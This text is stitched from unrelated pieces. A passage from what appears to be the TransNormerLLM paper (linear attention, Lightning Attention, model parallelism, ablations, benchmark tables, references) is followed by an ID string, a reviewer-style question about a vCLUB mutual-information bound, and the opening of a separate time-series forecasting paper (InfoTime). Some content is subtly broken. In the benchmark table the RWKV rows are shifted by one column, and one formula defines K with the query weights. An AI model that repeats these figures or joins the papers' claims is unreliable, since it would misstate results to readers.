introduced in TransNormer (Qin et al., 2022a) as follows: \( O = \text{Norm}((QK^\top)V) \) This attention mechanism eliminates the softmax and scaling operation. Moreover, it can be transformed into linear attention through right multiplication: \( O = \text{Norm}(Q(K^\top V)) \) This linear form allows for recurrent prediction with a complexity of \( O(nd^2) \), making it efficient during inference. Specifically, we only update \( K^\top V \) in a recurrent manner without computing the full attention matrix. In TransNormerLLM, we replace the RMSNorm with a new simple normalization function called SimpleRMSNorm, abbreviated as SRMSNorm: \( \text{SRMSNorm}(x) = \frac{x}{\|x\|_2/\sqrt{d}}. \) We empirically find that using SRMSNorm does not lead to any performance loss, as demonstrated in the ablation study in Table 8. 3.1.4 The overall structure The overall structure is illustrated in Figure 1. In this structure, the input \( X \) is updated through two consecutive steps: First, it undergoes Gated Linear Attention (GLA) with the application of SimpleRMSNorm (SRMSNorm) normalization. Then, it goes through the Simple Gated Linear Unit (SGLU) with SRMSNorm normalization again. This overall architecture helps improve the model’s performance based on the PreNorm approach. The pseudo-code of the overall process is as follows: \( X = X + \text{GLA(SRMSNorm}(X)), \) \( X = X + \text{SGLU(SRMSNorm}(X)). \) 3.2 Training Optimization 3.2.1 Lightning Attention The structure of linear attention allows for efficient attention calculation with a complexity... of $O(nd^2)$ through right-multiplication. However, for causal prediction, right-multiplication is not efficient as it necessitates `cumsum` computation \cite{Hua2022}, which hinders parallelism training. As a result, during training, we continue to use the conventional left-multiplication version. To accelerate attention calculations, we introduce the Lightning Attention algorithm inspired by \cite{Dao2023, Dao2022a}, which makes our linear attention IO-friendly. It computes the following: $$O = (QK^\top \odot M)V.$$ (10) Here, $M$ is the attention mask which enables lower triangular causal masking and positional encoding. In the Lightning Attention, we split the inputs $Q$, $K$, $V$ into blocks, load them from slow HBM to fast SRAM, then compute the attention output with respect to those blocks. Then we accumulate the final results. The computation speed is accelerated by avoiding the operations on slow HBM. The implementation details of Lightning Attention are shown in Appendix E, where Algorithm 3 for forward pass and Algorithm 4 for backward pass. ### 3.2.2 Model Parallelism on TransNormerLLM To effectively execute large-scale pre-training for TransNormerLLM, we have put efforts on system optimization encompassing various dimensions. Specifically, we employ fully sharded data parallelism (FSDP) \cite{Zhao2023}, a technique that shards all model parameters, gradients, and optimizer state tensors across the entire cluster. This strategic partition significantly reduces the memory footprint on each individual GPU, thereby enhancing memory utilization. In our pursuit of greater efficiency, we leverage activation checkpointing \cite{Shoeybi2019}, which minimizes the cached activations in memory during the forward pass. Instead of retaining these activations, they are recomputed when calculating gradients in the backward pass. This approach saves huge GPU memory thus enable to apply bigger batch size. Furthermore, we harness automatic mixed precision (AMP) \cite{Micikevicius2017} to simultaneously save GPU memory and expedite computational speed. It’s noteworthy that in our experimental setup, we employ BFloat16 \cite{Kalamkar2019} due to its observed advantage in enhancing the training stability of TransNormerLLM models. In addition to the previously mentioned optimization endeavors, we delve deeper into the realm of system engineering by implementing model parallelism specifically tailored to linear transformers, drawing inspiration from Megatron-LM model parallelism \cite{Shoeybi2019}. In a standard transformer model, each transformer layer comprises a self-attention block followed by a two-layer multi-layer perceptron (MLP) block. Megatron-LM model parallelism independently addresses these two constituent blocks. Similarly, within the architecture of TransNormerLLM, characterized by its two primary components, SGLU and GLA, we apply model parallelism to each of these components separately. The intricate details of our model parallelism strategies are elaborated below. #### Model Parallelism on SGLU Recall the SGLU structure in (5): $$O = [(XW_v) \odot (XW_u)]W_o,$$ (11) The model parallelism adaptation of SGLU is as follows: $$[O'_1, O'_2] = X[W'_1, W'_2] \odot X[W_1, W_2] = [XW'_1, XW'_2] \odot [XW_1, XW_2],$$ (12) which splits the weight matrices $W_v$ and $W_u$ along their columns and obtains an output matrix splitting along its columns too. Then the split output $[O'_1, O'_2]$ is multiplied by another matrix which is split along its rows as: $$O = [O'_1, O'_2][W'_o, W'_o]^\top = O'_1W'_o + O'_2W'_o$$ (13) Similar with model parallelism in Megatron-LM, this whole procedure splits three general matrix multiplies (GEMMs) inside the SGLU block across multiple GPUs and only introduces a single `all-reduce` collective communication operation in both the forward and backward passes, respectively. #### Model Parallelism on GLA Recall the GLA block in (3) and (4), its model parallelism version is: $$[O_1, O_2] = \text{SRMSNorm}(QK^\top V) \odot U,$$ (14) where: $$Q = [\phi(XW_q), \phi(XW_q)], K = [\phi(XW_q), \phi(XW_q)], V = X[W_1, W_2], U = X[W_1, W_2].$$ (15) Note that in our implementation, we use the combined QKUV projection to improve computation efficiency for linear attention. The obtained split output matrix $[O_1, O_2]$ again is multiplied by a weight matrix split along its columns which is similar to (13). Algorithm 1 Origin Inference Algorithm Input: \( q_t, k_t, v_t, t = 1, \ldots, n; \) Output: \( o_t, t = 1, \ldots, n; \) Initialize: \([kv]_0 = 0;\) for \( t = 1, \ldots, n \) do \[ [kv]_t = [kv]_{t-1} + k_t \lambda^{-t} v_t^\top, \] \( o_t = q_t \lambda^t [kv]_t. \) end for Algorithm 2 Robust Inference Algorithm Input: \( q_t, k_t, v_t, t = 1, \ldots, n; \) Output: \( o_t, t = 1, \ldots, n; \) Initialize: \([kv]_0 = 0;\) for \( t = 1, \ldots, n \) do \[ [kv]_t = \lambda [kv]_{t-1} + k_t v_t^\top, \] \( o_t = q_t [kv]_t. \) end for 3.3 Robust Inference In this section, we discuss the inference problem in TransNormerLLM. It is important to note that the formula can be decomposed into the following form: \[ a_{st} = (q_s \lambda^s \exp^{i\theta s})^\top (k_t \lambda^{-t} \exp^{i\theta t}). \tag{16} \] This allows TransNormerLLM to perform inference in the form of an RNN. Details of the procedure are shown in Algorithm 1. However, it is worth noting that \( \lambda < 1 \), which results in: \[ \|q_s \lambda^s \exp^{i\theta s}\|_2 = \|q_s\|_2 \lambda^s \to 0, \|k_t \lambda^{-t} \exp^{i\theta t}\|_2 = \|k_t\|_2 \lambda^{-t} \to \infty, \tag{17} \] leading to numerical precision issues. To avoid these issues, we propose a Robust Inference Algorithm in 2. Since \( \|q_s \exp^{i\theta s}\| = \|q_s\| \), \( \|k_t \exp^{i\theta t}\| = \|k_t\| \), for simplicity, we will omit LRPE (Qin et al., 2023b) in the subsequent discussions, considering only \( a_{st} = q_s^\top k_t \lambda^{s-t} \). We provide a mathematical proof of \([kv]_t = \lambda^{-t}[kv]_t\) in Appendix C. 4 Experiments We use PyTorch (Paszke et al., 2019) and Triton (Tillet et al., 2019) to implement TransNormerLLM in Metaseq framework (Zhang et al., 2022). Our model is trained using Adam optimizer (Kingma & Ba, 2017), and we employ FSDP to efficiently scale our model to NVIDIA A100 80G clusters. We additionally leverage the model parallel as appropriate to optimize performance. In ablation studies, all models are trained on a sampled corpus from our corpus with 300B tokens. In order to reduce the fluctuation of Losses and PPLs in the tables below, we compute the average Losses and PPLs of the last 1k iterations as the final metrics. For our benchmark models, we train our 385M, 1B, and 7B models on our corpus for 1 trillion, 1.2 trillion, and 1.4 trillion tokens respectively. We use an input sequence length of 8192 tokens in our pretraining process. For a comprehensive understanding of our corpus, encompassing intricate details such as data preprocessing methods and tokenization procedures, we direct interested readers to Appendix D. 4.1 Architecture Ablations Transformer vs TransNormerLLM We carried out a meticulous series of comparative tests between our TransNormerLLM and Transformer, spanning over an array of disparate sizes. The comparative performance of these models is clearly illustrated in Table 1. Under identical configurations, it becomes evident that our TransNormerLLM exhibits a superior performance profile compared to Transformer. We observed that TransNormerLLM outperformed Transformer by a remarkable 5% at the size of 385M. More importantly, as the size reached 1B, this superiority became even more pronounced, with an advantage of 9% for TransNormerLLM over Transformer. Table 1: Transformer vs TransNormerLLM. TransNormerLLM performs better than Transformer in size of 385M and 1B under identical configurations by 5% and 9%, respectively. | Model Size | 385M | 1B | |------------|------|----| | Method | Updates | Loss | PPL | Updates | Loss | PPL | | Transformer | 100K | 2.362 | 5.160 | 100K | 2.061 | 4.765 | | TransNormerLLM | 100K | 2.248 | 4.770 | 100K | 1.896 | 3.729 | TransNormer vs TransNormerLLM We compare the original TransNormer and the improved TransNormer-LLM and the results are shown in Table 2. TransNormerLLM exhibited an enhancement of 2% and 1% respectively. Table 2: TransNormer vs TransNormerLLM. | Method | Params | Updates | Loss | PPL | |-----------------|--------|---------|------|-----| | TransNormerLLM | 385M | 100K | 2.248| 4.770| | TransNormer-T1 | 379M | 100K | 2.290| 4.910| | TransNormer-T2 | 379M | 100K | 2.274| 4.858| Positional Encoding In the positional encoding experiment, we conducted a series of tests, comparing Mix (LRPE-d for the first layer, Exp-Decay for the rest), APE (Absolute Positional Encoding), LRPE, Exp-Decay (Exponential Decay), and LRPE-d. As evident from Table 3, Ours and LRPE-d achieve better performance than other options. We select the Mix positional encoding as it boosts the training speed up to 20% while only slightly worse than LRPE-d. We also perform ablations on the decay temperature \(1 - \frac{t}{T}\) in Eq. 2. The perplexity of the TransNormerLLM is reduced by adding the decay temperature, as shown in Table 4. Gating Mechanism We conduct ablation studies to examine the effect of including the gating mechanism. As observed in Table 5, gate enabled the reduction of the loss value from 2.263 to 2.248. GLA Activation Functions We conducted experiments on the GLA (Gated Linear Attention) structure with respect to the activation function. As shown in Table 6, using Swish and 1+elu leads to similar performance. However, in our experiments, using 1+elu in our 7B model may encounter a NaN problem, so we use Swish in our model. GLU Activation Functions We conduct an experiment by removing the activation function within the Gated Linear Units (GLU) structure. As shown in Table 7, the results reveal that this alteration had a negligible impact on the final outcome. As a result, we decide to adopt the Simple Gated Linear Units (SGLU) structure in our final model configuration. Normalization functions In our study, we conducted a series of ablation tests employing various normalization methods including SRMSNorm, RMSNorm and LayerNorm. The results indicate that there is almost no difference among these methods when applied to TransNormer-LLM. Nevertheless, during the course of our testing, we revisited and re-engineered the SRMSNorm using Triton. As it is shown in Figure 2, empirical evidence supports that our modification offers a significant boost in computational speed when operating with larger dimensions, compared to the PyTorch implementation methods. Lightning Attention We conducted a speed and memory comparison between our Lightning Attention and the baseline, which is the PyTorch implementation of the NormAttention (Qin et al., 2022a). Figure 3 (left) reports the runtime in milliseconds of the forward + backward pass. Baseline runtime grows quadratically with sequence length, while Lightning Attention operates significantly faster, at least 2× faster than the PyTorch implementation. Figure 3 (right) reports the memory footprint of Lightning Attention compared to the baseline. The memory footprint of Lightning Attention grows linearly with sequence length, which is up to 4× more efficient than the baseline when the sequence length is 8192. Our proposed Lightning Attention achieves superior efficiency. Table 3: Positional encoding. LRPE-d leads to the most optimal outcome. | PE Methods | Params | Updates | Loss | PPL | |------------|--------|---------|------|-----| | Mix | 385M | 100K | 2.248| 4.770| | APE | 386M | 100K | 2.387| 5.253| | Exp-Decay | 385M | 100K | 2.267| 4.834| | LRPE | 385M | 100K | 2.287| 4.899| | LRPE-d | 385M | 100K | 2.236| 4.728| Table 4: Ablations on decay temperature. The results of decay temperature proved to be superior. | Temperature | Params | Updates | Loss | PPL | |-------------|--------|---------|------|-----| | w/ temperature | 385M | 100K | 2.248 | 4.770 | | w/o temperature | 385M | 100K | 2.258 | 4.804 | Table 5: Ablations on gating mechanism. The performance with the gate proved to be superior. | Gate | Params | Updates | Loss | PPL | |------|--------|---------|------|-----| | w/ gate | 385M | 100K | 2.248 | 4.770 | | w/o gate | 379M | 100K | 2.263 | 4.820 | Table 6: Ablations on GLA activation functions. The results obtained from different activation functions were virtually identical. | GLA Act | Params | Updates | Loss | PPL | |---------|--------|---------|------|-----| | Swish | 385M | 100K | 2.248| 4.770| | No Act | 385M | 100K | 2.283| 4.882| | 1+elu | 385M | 100K | 2.252| 4.767| Table 7: Ablations on GLU activation functions. The exclusion of the activation function had no negative impact on the results. | GLU Act | Params | Updates | Loss | PPL | |---------|--------|---------|------|-----| | No Act | 385M | 100K | 2.248| 4.770| | Swish | 385M | 100K | 2.254| 4.788| Table 8: Normalization Functions. The deviation in results among the bellowing normalization functions is minimal. | Norm Type | Params | Updates | Loss | PPL | |-----------|--------|---------|------|-----| | SRMSNorm | 385M | 100K | 2.248| 4.770| | RMSNorm | 385M | 100K | 2.247| 4.766| | LayerNorm | 385M | 100K | 2.247| 4.765| Figure 2: Performance Evaluation of SRMSNorm Implementation. The upper figures exhibit the runtime comparison of the forward pass (left) and backward pass (right) for different sequence lengths, with a fixed feature dimension of 3072. The lower two figures illustrate the runtime comparison for various feature dimensions, with a fixed sequence length of 4096. Figure 3: Memory and speed comparison between linear attention and lightning attention. Left: runtime of forward + backward pass milliseconds for different sequence lengths, with a fixed feature dimension of 2048. Right: memory footprints of forward + backward pass for different sequence lengths, with a fixed feature dimension of 2048. Figure 4: Inference Time and Memory Footprint. Left: inference runtime measured in milliseconds across different sequence lengths. Right: memory consumption during inference for varying sequence lengths. It is noteworthy that as the sequence length increases, TransNormerLLM demonstrates a consistent inference time and memory footprint. 4.2 Benchmarks In order to validate the effectiveness of TransNormerLLM, we tested our 385M, 1B, and 7B models on Commonsense Reasoning Task, MMLU (Hendrycks et al., 2021), CMMLU (Li et al., 2023), and C-Eval (Huang et al., 2023). For comparison, we selected several open-source models as competitors, including Transformer-based models such as OPT (Zhang et al., 2022), Pythia (Biderman et al., 2023), BLOOM (Workshop et al., 2023), GPT-Neo (Black et al., 2022), GPT-J (Wang & Komatsuaki, 2021), MPT (Team et al., 2023), Falcon (Almazrouei et al., 2023), LLaMA1/2 (Touvron et al., 2023a,b), OpenLLAMA v1/v2 (Geng & Liu, 2023), Baichuan 1/2 (Baichuan, 2023), ChatGLM 1/2 (Zeng et al., 2022) (Du et al., 2022), and non-Transformer model RWKV (Peng et al., 2023a). It can be observed that, compared to these models, TransNormerLLM remains highly competitive. Table 9: Performance Comparison on Commonsense Reasoning and Aggregated Benchmarks. For a fair comparison, we report competing methods’ results reproduced by us using their released models. Official results are denoted in *italics*. PS: parameter size (billion). T: tokens (trillion). HS: HellaSwag. WG: WinoGrande. | Model | PS | T | BoolQ | PIQA | HS | WG | ARC-e | ARC-c | OBQA | MMLU | CMMLU | C-Eval | |---------|-------|-------|-------|------|------|------|-------|-------|------|------|-------|--------| | OPT | 0.35 | 0.30 | 57.74 | 64.58| 36.69| 52.49| 44.02 | 23.89 | 28.20| 26.02| 25.34 | 25.71 | | Pythia | 0.40 | 0.30 | 60.40 | 67.08| 40.52| 53.59| 51.81 | 24.15 | 29.40| 25.99| 25.16 | 24.81 | | BLOOM | 0.56 | 0.35 | 55.14 | 64.09| 36.97| 52.80| 47.35 | 23.98 | 28.20| 24.80| 25.35 | 27.14 | | RWKV | 0.43 | 0.30 | - | 67.52| 40.90| 51.14| 52.86 | 25.17 | 32.40| 24.85| - | - | | Ours | 0.39 | 1.0 | 62.14 | 66.70| 46.27| 54.46| 55.43 | 27.99 | 32.40| 25.90| 25.05 | 25.24 | | GPTNeo | 1.3 | 0.3 | 61.99 | 71.11| 48.93| 54.93| 56.19 | 25.85 | 33.60| 24.82| 26.03 | 23.94 | | OPT | 1.3 | 0.3 | 57.77 | 71.71| 53.70| 59.35| 57.24 | 29.69 | 33.20| 24.96| 24.97 | 25.32 | | Pythia | 1.4 | 0.3 | 60.73 | 70.67| 47.18| 53.51| 56.99 | 26.88 | 31.40| 26.55| 25.13 | 24.25 | | BLOOM | 1.1 | 0.35 | 59.08 | 67.14| 42.98| 54.93| 51.47| 25.68 | 29.40| 27.30| 25.09 | 26.50 | | RWKV | 1.5 | 0.3 | 72.36 | 52.48| 54.62| 60.48| 29.44 | 34.00 | 25.77| - | - | - | | Falcon | 1.0 | 0.35 | 61.38 | 73.14| 61.30| 60.30| 62.71 | 32.17 | 33.60| 23.28| 24.88 | 25.66 | | Ours | 1.0 | 1.2 | 63.27 | 72.09| 56.49| 60.38| 63.68 | 35.24 | 36.60| 27.10| 25.88 | 26.01 | | GPTJ | 6.9 | 0.3 | 63.44 | 75.41| 64.75| 64.09| 66.92 | 36.60 | 38.20| 25.70| 26.47 | 25.39 | | OPT | 6.7 | 0.3 | 66.18 | 76.22| 67.21| 69.19| 65.66 | 34.64 | 37.29| 25.57| 25.36 | 25.32 | | Pythia | 6.9 | 0.3 | 63.46 | 75.14| 63.92| 60.77| 67.34 | 35.11 | 37.00| 24.64| 25.56 | 26.40 | | BLOOM | 7.1 | 0.35 | 62.91 | 72.69| 62.33| 64.01| 65.11 | 33.45 | 35.80| 26.25| 24.97 | 24.25 | | RWKV | 7.4 | 0.3 | 76.06 | 65.51| 61.01| 67.80| 37.46 | 40.20 | 24.96| - | - | - | | MPT | 6.9 | 1.0 | 73.88 | 79.43| 76.25| 68.27| 74.79| 41.72 | 42.20| 30.80| 25.99 | 24.06 | | Falcon | 7.2 | 1.5 | 73.73 | 79.38| 76.3 | 67.17| 74.62| 43.60 | 43.80| 27.79| 25.73 | 22.92 | | Baichuan1 | 7.0 | 1.2 | 70.09 | 76.01| 70.06| 64.09| 71.72| 40.53 | 38.20| 42.30| 44.43 | 42.80 | | Baichuan2 | 7.0 | 2.6 | 72.72 | 76.50| 72.17| 68.35| 75.17| 42.32 | 39.60| 54.16| 57.07 | 54.00 | | ChatGLM1 | 6.7 | 1.0 | 74.74 | 68.88| 45.57| 52.25| 48.78| 31.66 | 36.80| 40.63| 37.48 | 40.23 | | ChatGLM2 | 7.1 | 1.4 | 77.65 | 69.37| 50.51| 57.62| 59.13| 34.30 | 37.00| 45.46| 48.80 | 52.55 | | OpenLaMAv1 | 6.7 | 1.0 | 70.43 | 75.68| 69.23| 66.69| 71.17| 38.57 | 39.00| 30.49| 25.40 | 26.09 | | OpenLaMAv2 | 6.7 | 1.0 | 72.20 | 78.84| 74.51| 65.67| 72.39| 41.30 | 41.00| 41.29| 29.58 | 30.01 | | LLaMA1 | 6.7 | 1.0 | 76.50 | 79.80| 76.10| 70.10| 72.80| 47.60 | 57.20| 35.10| 25.62 | 25.72 | | LLaMA2 | 6.7 | 2.0 | 77.68 | 78.07| 76.02| 68.98| 76.30| 46.33 | 44.20| 45.30| 32.96 | 33.20 | | Ours | 6.8 | 1.4 | 75.87 | 80.09| 75.21| 66.06| 75.42| 44.40 | 63.40| 43.10| 47.99 | 43.18 | **Commonsense Reasoning** We report BoolQ (Clark et al., 2019), PIQA (Bisk et al., 2019), SIQA (Sap et al., 2019), HellaSwag (Zellers et al., 2019), WinoGrande (Sakaguchi et al., 2019), ARC easy and challenge (Clark et al., 2018), OpenBookQA (Mihaylov et al., 2018) and their average. We report 0-shot results for all benchmarks using LM-Eval-Harness (Gao et al., 2021). All of our models achieve competitive performance compared to existing state-of-the-art LLMs, showcasing a remarkable ability to comprehend and apply commonsense reasoning. **Aggregated Benchmarks** We report the overall results for MMLU (Hendrycks et al., 2021), CMMLU (Li et al., 2023), C-Eval (Huang et al., 2023). Official scripts were used for evaluating MMLU, CMMLU, and C-Eval, with all evaluation results being conducted with a 5-shot setup. In comparison to top-tier open-source models available in the industry, our models have demonstrated matched performance in both English and Chinese benchmarks. ### 4.3 SCALING TO 175B Furthermore, we have carried out a series of experiments to assess the efficacy of model parallelism as applied to the TransNormerLLM architecture. The comprehensive outcomes of these experiments have been thoughtfully presented in Appendix E.1. Moreover, our research extends to the meticulous evaluation of various cutting-edge system optimization techniques. This evaluation encompasses their impact on both training speed and context length across models ranging from 7B to 175B in scale. We have thoughtfully documented the detailed results of these experiments in Appendix E.2. ### 5 CONCLUSION We introduced TransNormerLLM in this paper, an improved TransNormer that is tailored for LLMs. Our TransNormerLLM consistently outperformed Transformers in both accuracy and efficiency. Extensive ablations demonstrate the effectiveness of our modifications and innovations in position encoding, gating mechanism, activation functions, normalization functions, and lightning attentions. These modifications collectively contribute to TransNormerLLM’s outstanding performance, positioning it as a promising choice for state-of-the-art language models. The benchmark results for models with sizes of 385 million, 1 billion, and 7 billion parameters unequivocally demonstrate that TransNormerLLM not only matches the performance of current leading Transformer-based Large Language Models (LLMs) but also enjoys faster inference speeds. We will release our pre-trained TransNormerLLM models to foster community advancements in efficient LLM. REFERENCES Ebtesam Almazrouei, Hamza Alobeidli, Abdulaziz Alshamsi, Alessandro Cappelli, Ruxandra Cojocaru, Merouane Debbah, Etienne Goffinet, Daniel Heslow, Julien Launay, Quentin Malartic, et al. Falcon-40b: an open large language model with state-of-the-art performance. Technical report, Technical report, Technology Innovation Institute, 2023. Baichuan. Baichuan 2: Open large-scale language models. arXiv preprint arXiv:2309.10305, 2023. URL https://arxiv.org/abs/2309.10305 Iz Beltagy, Matthew E. Peters, and Arman Cohan. Longformer: The long-document transformer, 2020. Stella Biderman, Hailey Schoelkopf, Quentin Anthony, Herbie Bradley, Kyle O’Brien, Eric Hallahan, Mohammad Aftab Khan, Shivanshu Purohit, USVSN Sai Prashanth, Edward Raff, Aviya Skowron, Lintang Sutawika, and Oskar van der Wal. Pythia: A suite for analyzing large language models across training and scaling, 2023. Yonatan Bisk, Rowan Zellers, Ronan Le Bras, Jianfeng Gao, and Yejin Choi. Piqa: Reasoning about physical commonsense in natural language, 2019. Sid Black, Stella Biderman, Eric Hallahan, Quentin Anthony, Leo Gao, Laurence Golding, Horace He, Connor Leahy, Kyle McDonell, Jason Phang, et al. Gpt-neox-20b: An open-source autoregressive language model. arXiv preprint arXiv:2204.06745, 2022. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. Advances in neural information processing systems, 33:1877–1901, 2020. Rewon Child, Scott Gray, Alec Radford, and Ilya Sutskever. Generating long sequences with sparse transformers, 2019. Krzysztof Marcin Choromanski, Valerii Likhosherstov, David Dohan, Xingyou Song, Andreea Gane, Tamas Sarlos, Peter Hawkins, Jared Quincy Davis, Afroz Mohiuddin, Lukasz Kaiser, David Benjamin Belanger, Lucy J Colwell, and Adrian Weller. Rethinking attention with performers. In International Conference on Learning Representations, 2021. URL https://openreview.net/forum?id=Ua6zuk0WRH Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, Parker Schuh, Kensen Shi, Sasha Tsvyashchenko, Joshua Maynez, Abhishek Rao, Parker Barnes, Yi Tay, Noam Shazeer, Vinodkumar Prabhakaran, Emily Reif, Nan Du, Ben Hutchinson, Reiner Pope, James Bradbury, Jacob Austin, Michael Isard, Guy Gur-Ari, Pengcheng Yin, Toju Duke, Anselm Levskaya, Sanjay Ghemawat, Sumita Dev, Henryk Michalewski, Xavier Garcia, Vedant Misra, Kevin Robinson, Liam Fedus, Denny Zhou, Daphne Ippolito, Davidi Luan, Hyeontaek Lim, Barret Zoph, Alexander Spiridonov, Ryan Sepassi, David Dohan, Shivani Agrawal, Mark Omernick, Andrew M. Dai, Thanumalayan Sankaranarayana Pillai, Marie Pellat, Aitor Lewkowycz, Erica Moreira, Rewon Child, Oleksandr Polozov, Katherine Lee, Zongwei Zhou, Xuezhi Wang, Brennan Saeta, Mark Diaz, Orhan Firat, Michele Catasta, Jason Wei, Kathy Meier-Hellstern, Douglas Eck, Jeff Dean, Slav Petrov, and Noah Fiedel. Palm: Scaling language modeling with pathways, 2022. Christopher Clark, Kenton Lee, Ming-Wei Chang, Tom Kwiatkowski, Michael Collins, and Kristina Toutanova. Boolq: Exploring the surprising difficulty of natural yes/no questions, 2019. Peter Clark, Isaac Cowhey, Oren Etzioni, Tushar Khot, Ashish Sabharwal, Carissa Schoenick, and Oyvind Tafjord. Think you have solved question answering? try arc, the ai2 reasoning challenge, 2018. Tri Dao. Flashattention-2: Faster attention with better parallelism and work partitioning. arXiv preprint arXiv:2307.08691, 2023. Tri Dao, Daniel Y. Fu, Stefano Ermon, Atri Rudra, and Christopher Ré. FlashAttention: Fast and memory-efficient exact attention with IO-awareness. In Advances in Neural Information Processing Systems, 2022a.
gyJpajLkX2
Additionally on the upper bound, the authors state that they choose to adopt the sampled vCLUB and minimize I_{vCLUB-S}(Xo; Zi). Could they expand on why this sampling strategy was chosen and what the actual derived upper bound might be?
Enhancing Multivariate Time Series Forecasting with Mutual Information-driven Cross-variable and Temporal Modeling Anonymous authors Paper under double-blind review Abstract Recent researches have showcased the significant effectiveness of deep learning techniques for multivariate time series forecasting (MTSF). Broadly speaking, these techniques are bifurcated into two categories: Channel-independence and Channel-mixing approaches. While Channel-independence models have generally demonstrated superior outcomes, Channel-mixing methods, especially when dealing with time series that display inter-variable correlations, theoretically promise enhanced performance by incorporating the correlation between variables. However, we contend that the unnecessary integration of information through Channel-mixing can curtail the potential enhancement in MTSF model performance. To substantiate this claim, we introduce the Cross-variable Decorrelation Aware feature Modeling (CDAM) for Channel-mixing approaches. This approach is geared toward reducing superfluous information by minimizing the mutual information between the latent representation of a single univariate sequence and its accompanying multivariate sequence input. Concurrently, it optimizes the joint mutual information shared between the latent representation, its univariate input, and the associated univariate forecast series. Notably, prevailing techniques directly project future series using a single-step forecaster, sidelining the temporal correlation that might exist across varying timesteps in the target series. Addressing this gap, we introduce the Temporal correlation Aware Modeling (TAM). This strategy maximizes the mutual information between adjacent subsequences of both the forecasted and target series. By synergizing CDAM and TAM, we sculpt a pioneering framework for MTSF, named as InfoTime. Comprehensive experimental analysis have demonstrated the capability of InfoTime to consistently outpace existing models, encompassing even those considered state-of-the-art. 1 Introduction Multivariate time series forecasting (MTSF) plays a pivotal role in diverse applications ranging from traffic flow estimation (Bai et al., 2020), weather prediction (Chen et al., 2021), energy consumption (Zhou et al., 2021) and healthcare (Bahadori & Lipton, 2019). Deep learning has ushered in a new era for MTSF, with methodologies rooted in RNN-based (Franceschi et al., 2019; Liu et al., 2018; Salinas et al., 2020; Rangapuram et al., 2018) and CNN-based models (Lea et al., 2017; Lai et al., 2018), that surpass the performance metrics set by traditional techniques (Box et al., 2015). A notable breakthrough has been the advent of Transformer-based models (Li et al., 2019; Zhou et al., 2021; Chen et al., 2021; Zhou et al., 2022). Equipped with attention mechanisms, these models adeptly seize long-range temporal dependencies, establishing a new benchmark for forecasting efficacy. While their primary intent is to harness multivariate correlations, recent research indicates a potential shortcoming: these models might not sufficiently discern cross-variable dependencies (Murphy & Chen, 2022; Nie et al., 2022; Zeng et al., 2022). This has spurred initiatives to tease out single variable information for more nuanced forecasting. When it comes to modeling variable dependencies, MTSF models can be broadly classified into two categories: Channel-mixing models and Channel-independence models, as highlighted in Figure 1 (a) (Nie et al., 2022). Specifically, Channel-mixing models ingest all features from the time series, projecting them into an embedding space to blend information. Conversely, Channel-independence models restrict their input token to information sourced from just one channel. Recent studies (Murphy & Chen, 2022; Nie et al., 2022; Zeng et al., 2022) indicates that Channel-independence models significantly outpace Channel-mixing models on certain datasets. Yet, this advantage comes with a trade-off: the omission of crucial cross-variable information. Such an omission can be detrimental, especially when the variables inherently correlate. Illustratively, Figure 1(b) showcases traffic flow variations from six proximate detectors in the PEMS08 dataset (Chen et al., 2001). A discernible trend emerges across these detectors, suggesting that exploiting their interrelated patterns could bolster predictive accuracy for future traffic flows. In a comparative experiment, we trained both a Channel-independence model (PatchTST) and a Channel-mixing model (Informer) using the PEMS08 dataset. The outcome, as visualized in Figure 1(c), unequivocally shows Informer’s superior performance over PatchTST, underscoring the importance of cross-variable insights. Motivated by these findings, we introduce the Cross-Variable Decorrelation Aware Feature Modeling (CDAM) for Channel-mixing methodologies. CDAM aims to hone in on cross-variable information and prune redundant data. It achieves this by minimizing mutual information between the latent depiction of an individual univariate time series and related multivariate inputs, while concurrently amplifying the shared mutual information between the latent model, its univariate input, and the subsequent univariate forecast. Apart from modeling channel dependence, another significant challenge in MTSF is the accumulation of errors along time, as shown in Figure 1(a). To mitigate this, a number of studies (Nie et al., 2022; Zeng et al., 2022; Zhou et al., 2021; Zhang & Yan) have adopted a direct forecasting strategy using a single-step forecaster that generates multi-step predictions in a single step, typically configured as a fully-connected network. Although often superior to auto-regressive forecasters, this method tends to neglect the temporal correlations across varied timesteps in the target series, curtailing its potential to capture series inter-dependencies effectively. Drawing inspiration from the notable temporal relationships observed in adjacent sub-sequences post-downsampling (Liu et al., 2022a), we propose Temporal Correlation Aware Modeling (TAM), which iteratively down-samples and optimizes mutual information between consecutive sub-sequences of both the forecasted and target series. In essence, this paper delves into two pivotal challenges in multivariate time series forecasting: **cross-variable relationships** and **temporal relationships**. Drawing inspiration from these challenges, we develop a novel framework, denoted as InfoTime. This framework seamlessly integrates CDAM and TAM. Our paper’s key contributions encompass: - We introduce Cross-Variable Decorrelation Aware Feature Modeling (CDAM) designed specifically for Channel-mixing methods. It adeptly distills cross-variable information, simultaneously filtering out superfluous information. - Our proposed Temporal Correlation Aware Modeling (TAM) is tailored to effectively capture the temporal correlations across varied timesteps in the target series. - Synthesizing CDAM and TAM, we unveil a cutting-edge framework for MTSF, denominated as InfoTime. Through rigorous experimentation on diverse real-world datasets, it’s evident that our InfoTime consistently eclipses existing Channel-mixing benchmarks, achieving superior accuracy and notably mitigating overfitting. Furthermore, InfoTime enhances the efficacy of Channel-Independent models, especially in instances with ambiguous cross-variable traits. ## 2 RELATED WORK ### 2.1 MULTIVARIATE TIME SERIES FORECASTING Multivariate time series forecasting is the task of predicting future values of variables, given historical observations. With the development of deep learning, various neural models have been proposed and demonstrated promising performance in this task. RNN-based (Franceschi et al., 2019; Salinas et al., 2020; Rangapuram et al., 2018) and CNN-based (Lea et al., 2017; Lai et al., 2018) models are proposed for models time series data using RNN or CNN respectively, but these models have difficulty in modeling long-term dependency. In recent years, a large body of works try to apply Transformer models to forecast long-term multivariate series and have shown great potential (Li et al., 2019; Zhou et al., 2021; Chen et al., 2021; Zhou et al., 2022; Nie et al., 2022). Especially, LogTrans (Li et al., 2019) proposes the LogSparse attention in order to reduce the complexity from $O(L^2)$ to $O(L(\log L)^2)$. Informer (Zhou et al., 2021) utilizes the sparsity of attention score through KL-divergence estimation and proposes ProbSparse self-attention mechanism which achieves $O(L \log L)$ complexity. Autoformer (Chen et al., 2021) introduces a decomposition architecture with the Auto-Correlation mechanism to 